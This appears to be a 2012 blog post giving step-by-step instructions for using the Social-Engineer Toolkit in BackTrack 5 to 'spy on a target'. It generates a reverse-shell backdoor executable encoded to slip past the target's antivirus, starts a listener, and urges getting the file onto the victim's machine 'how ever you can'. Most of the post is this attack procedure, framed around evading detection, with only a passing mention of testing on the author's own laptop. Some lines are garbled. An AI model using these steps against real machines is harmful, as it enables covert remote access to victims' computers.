Wednesday, July 25, 2012

Spying on the target with Set in backtrack5



(Spying on a target machine with set)

S first you need to change to that directory by typing the following:

cd /pentest/exploits/set  and hit enter.

then type: ./set  and hit enter.

now you're in Set (social engineering tool kit)

next you will see the set options ands set interface as shown in the picture. keep in mind that yours may look a bit different..


you will be presented with the options listed below.

Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Metasploit Framework
   5) Update the Social-Engineer Toolkit
   6) Help, Credits, and About
   99) Return back to the main menu.

for this attack you will choose number (1) and hit enter.


then you will see the following

1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) SMS Spoofing Attack Vector
   8) Wireless Access Point Attack Vector
   9) QRCode Generator Attack Vector
  10) Powershell Attack Vectors
  11) Third Party Modules
  99) Return back to the main menu.

you will choose number (4) and hit enter.
note for the entire network, use the // // as the ip.. that listen's all on the network...

next you see the following:

What payload do you want to generate:

  Name:                                       Description:

   1) Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker
   2) Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker
   3) Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker
   4) Windows Bind Shell                      Execute payload and create an accepting port on remote system
   5) Windows Bind Shell X64                  Windows x64 Command Shell, Bind TCP Inline
   6) Windows Shell Reverse_TCP X64           Windows X64 Command Shell, Reverse TCP Inline
   7) Windows Meterpreter Reverse_TCP X64     Connect back to the attacker (Windows x64), Meterpreter
   8) Windows Meterpreter Egress Buster       Spawn a meterpreter shell and find a port home via multiple ports
   9) Windows Meterpreter Reverse HTTPS       Tunnel communication over HTTP using SSL and use Meterpreter
  10) Windows Meterpreter Reverse DNS         Use a hostname instead of an IP address and spawn Meterpreter
  11) SE Toolkit Interactive Shell            Custom interactive reverse toolkit designed for SET
  12) SE Toolkit HTTP Reverse Shell           Purely native HTTP shell with AES encryption support
  13) RATTE HTTP Tunneling Payload            Security bypass payload that will tunnel all comms over HTTP
  14) ShellCodeExec Alphanum Shellcode        This will drop a meterpreter payload through shellcodeexec (A/V Safe)
  15) Import your own executable              Specify a path for your own executable

you will then choose number (3) and hit enter

next, you will see:

Select one of the below, 'backdoored executable' is typically the best.

   1) avoid_utf8_tolower (Normal)
   2) shikata_ga_nai (Very Good)
   3) alpha_mixed (Normal)
   4) alpha_upper (Normal)
   5) call4_dword_xor (Normal)
   6) countdown (Normal)
   7) fnstenv_mov (Normal)
   8) jmp_call_additive (Normal)
   9) nonalpha (Normal)
  10) nonupper (Normal)
  11) unicode_mixed (Normal)
  12) unicode_upper (Normal)
  13) alpha2 (Normal)
  14) No Encoding (None)
  15) Multi-Encoder (Excellent)
  16) Backdoored Executable (BEST)

choose number (16) and hit enter:

you will be asked to set PORT of the listener [443]: i choose 443  but see notes below                                                                                                                                                                                      machiene  you what will and what will not be detected..
note" you should find out what anti virus the target has, or you may get caught by the target's anti virus

after choosing your port, hit enter.. it will now create that backdoor listener to bypass the anti virus:

hit yes when prompted to start the listener


now open a new konsole and set it to the directly we first started a by typing the following: cd /pentest/exploits/set now hit enter...

now type ls and hit enter..

you will now see whats inside and we're looking for the "msf.exe" file and we will want to copy this file to the desktop, or wherever you want it. so we can put the file on the target machiene..

to copy this file, type the following in cp msf.exe ~/Desktop/msf.exe and hit enter.. the file should now be on your desktop :)
now exit that terminal


to put the file on the target machine. you will need to be creative to do this. remember, we're in the social engineering toolkit' so get the file on the machine how ever you can... for me, im testing this on my own laptop so i just put it there..


that's all. any questions, just let me know............................................................................................................................................................................................................................

0 comments: